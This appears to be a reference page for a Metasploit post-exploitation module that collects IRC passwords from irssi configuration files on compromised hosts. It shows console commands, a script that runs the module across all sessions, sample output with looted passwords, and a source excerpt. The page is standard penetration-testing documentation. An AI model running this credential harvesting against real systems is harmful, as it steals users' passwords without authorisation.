Multi Gather IRSSI IRC Password(s) - Metasploit


This page contains detailed information about how to use the post/multi/gather/irssi_creds metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Multi Gather IRSSI IRC Password(s)
Module: post/multi/gather/irssi_creds
Source code: modules/post/multi/gather/irssi_creds.rb
Disclosure date: -
Last modification time: 2017-07-24 06:26:21 +0000
Supported architecture(s): -
Supported platform(s): BSD, Linux, OSX, Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module grabs IRSSI IRC credentials.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/multi/gather/irssi_creds

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/multi/gather/irssi_creds
msf post(irssi_creds) > show options
    ... show and set options ...
msf post(irssi_creds) > set SESSION session-id
msf post(irssi_creds) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/multi/gather/irssi_creds")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


irssi an IRC and chat client.

This module was successfully tested against:

  • OSX 10.10.5 and IRSSI version 0.8.19

Verification Steps


  1. Get a shell or meterpreter session on some host.
  2. Do: use post/multi/gather/irssi_creds
  3. Do: set SESSION [SESSION_ID]
  4. Do: run
  5. If the system has readable configuration files containing irc passwords, they will be printed out.

Scenarios


OSX 10.10.5 and IRSSI version 0.8.19

msf post(irssi_creds) > run

msf post(irssi_creds) > run

[*] Finding ~/.irssi/config
[*] Looting 1 files
[+] Found a IRC password(s): chubbybunnies,meatpopcicle
[+] IRC password(s) stored in /Users/jclaudius/.msf4/loot/20170410153351_default_192.168.10.99_irc.password_159907.txt
[+] IRC password(s) stored in /Users/jclaudius/.msf4/loot/20170410153351_default_192.168.10.99_irc.password_967698.txt
[*] Post module execution completed

Go back to menu.

Msfconsole Usage


Here is how the multi/gather/irssi_creds post exploitation module looks in the msfconsole:

msf6 > use post/multi/gather/irssi_creds

msf6 post(multi/gather/irssi_creds) > show info

       Name: Multi Gather IRSSI IRC Password(s)
     Module: post/multi/gather/irssi_creds
   Platform: BSD, Linux, OSX, Unix
       Arch: 
       Rank: Normal

Provided by:
  Jonathan Claudius <[email protected]>

Compatible session types:
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module grabs IRSSI IRC credentials.

Module Options


This is a complete list of options available in the multi/gather/irssi_creds post exploitation module:

msf6 post(multi/gather/irssi_creds) > show options

Module options (post/multi/gather/irssi_creds):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the multi/gather/irssi_creds post exploitation module:

msf6 post(multi/gather/irssi_creds) > show advanced

Module advanced options (post/multi/gather/irssi_creds):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the multi/gather/irssi_creds module can do:

msf6 post(multi/gather/irssi_creds) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the multi/gather/irssi_creds post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(multi/gather/irssi_creds) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No users found with a ~/.irssi/config file


Here is a relevant code snippet related to the "No users found with a ~/.irssi/config file" error message:

26:	    print_status('Finding ~/.irssi/config')
27:	    paths = enum_user_directories.map { |d| d + '/.irssi/config' }
28:	    paths = paths.select { |f| file?(f) }
29:	
30:	    if paths.empty?
31:	      print_error('No users found with a ~/.irssi/config file')
32:	      return
33:	    end
34:	
35:	    download_passwords(paths)
36:	  end

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • Jonathan Claudius <jclaudius[at]mozilla.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.